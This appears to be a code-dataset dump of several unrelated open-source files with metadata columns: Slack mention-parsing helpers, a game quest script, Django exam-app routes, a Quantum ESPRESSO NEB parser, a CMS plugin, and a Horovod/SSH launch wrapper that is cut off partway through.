# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| en | 0.732703 | # regex for a user or channel mention at the beginning of a message # example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>" # interactive playground: https://regex101.com/r/2Z7eun/2 #(.*?)\|.*?>\s?)" get the element from the set to which the iterator points; returns an arbitrary item given a Match, return the Person corresponding to the passed user ID given a Match, return the Person corresponding to the user who is NOT the passed user ID (i.e. the other Person) return `message` with markdown blockquote formatting (start each line with "> ") get the user or channel ID mentioned at the beginning of a message, if any # return the first not-None value in the match group tuple, be it a # user or channel mention # https://stackoverflow.com/a/18533669 remove the user or channel mention from the beginning of a message, if any | 3.237308 | 3 |
scripts/quest/q3526s.py | pantskun/swordiemen | 0 | 9190 | # In Search for the Lost Memory [Explorer Thief] (3526)
# To be replaced with GMS's exact dialogue.
# Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere):
# https://kaengouraiu2.blog.fc2.com/blog-entry-46.html
recoveredMemory = 7081
darkLord = 1052001
sm.setSpeakerID(darkLord)
sm.sendNext("The way you moved without a trace...you must have exceptional talent. "
"Long time no see, #h #.")
sm.sendSay("Since when did you grow up to this point? You're no less inferior to any Dark Lord. "
"You were just a greenhorn that couldn't even hide their presence...Hmph, well, it's been a while since then. "
"Still, it feels weird to see you become so strong. I guess this is how it feels to be proud.")
sm.sendSay("But don't let your guard down. Know that there's still more progress to be made. "
"As the one who has made you into a thief, I know you that you can be even stronger...!")
sm.startQuest(parentID)
sm.completeQuest(parentID)
sm.startQuest(recoveredMemory)
sm.setQRValue(recoveredMemory, "1", False) | # In Search for the Lost Memory [Explorer Thief] (3526)
# To be replaced with GMS's exact dialogue.
# Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere):
# https://kaengouraiu2.blog.fc2.com/blog-entry-46.html
recoveredMemory = 7081
darkLord = 1052001
sm.setSpeakerID(darkLord)
sm.sendNext("The way you moved without a trace...you must have exceptional talent. "
"Long time no see, #h #.")
sm.sendSay("Since when did you grow up to this point? You're no less inferior to any Dark Lord. "
"You were just a greenhorn that couldn't even hide their presence...Hmph, well, it's been a while since then. "
"Still, it feels weird to see you become so strong. I guess this is how it feels to be proud.")
sm.sendSay("But don't let your guard down. Know that there's still more progress to be made. "
"As the one who has made you into a thief, I know you that you can be even stronger...!")
sm.startQuest(parentID)
sm.completeQuest(parentID)
sm.startQuest(recoveredMemory)
sm.setQRValue(recoveredMemory, "1", False) | en | 0.846217 | # In Search for the Lost Memory [Explorer Thief] (3526) # To be replaced with GMS's exact dialogue. # Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere): # https://kaengouraiu2.blog.fc2.com/blog-entry-46.html #h #.") | 1.544862 | 2 |
student/urls.py | rummansadik/Admission-Automation | 0 | 9191 | from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| none | 1 | 1.754788 | 2 |
|
aiida_quantumespresso/parsers/neb.py | lin-cp/aiida-quantumespresso | 0 | 9192 | <gh_stars>0
# -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| # -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options' | en | 0.760504 | # -*- coding: utf-8 -*- `Parser` implementation for the `NebCalculation` calculation job class. Parse the retrieved files of a completed `NebCalculation` into output nodes. Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files` which should contain the temporary retrieved files. # Note: this includes folders, but not the files they contain. # The stdout is required for parsing # Look for optional settings input node and potential 'parser_options' dictionary within it # Note that we look for both NEB and PW parser options under "inputs.settings.parser_options"; # we don't even have a namespace "inputs.pw.settings". # load the pw input parameters dictionary # load the neb input parameters dictionary # First parse the Neb output # TODO: why do we ignore raw_successful ? # Retrieve the number of images # Now parse the information from the individual pw calculations for the different images # for each image... # check if any of the known XML output file names are present, and parse the first that we find # this image is dealt with, so break the inner loop and go to the next image # otherwise, if none of the filenames we tried exists, exit with an error # look for pw output and parse it # Note: read() and not readlines() # Explicit information about k-points does not need to be queryable so we remove it from the parameters # Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead? # Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying # If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space # Add also PW warnings and errors to the neb output data, avoiding repetitions. # Symbols can be obtained simply from the last image # Load the original and interpolated energy profile along the minimum-energy path (mep) # Create an ArrayData with the energy profiles Return the key that contains the optional parser options in the `settings` input node. | 2.164714 | 2 |
foundation/djangocms_submenu/cms_plugins.py | Mindelirium/foundation | 0 | 9193 | <reponame>Mindelirium/foundation
from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin)
| from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin) | none | 1 | 1.601943 | 2 |
|
training/horovod/base/horovod_wrapper.py | thehardikv/ai-platform-samples | 418 | 9194 | <reponame>thehardikv/ai-platform-samples
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
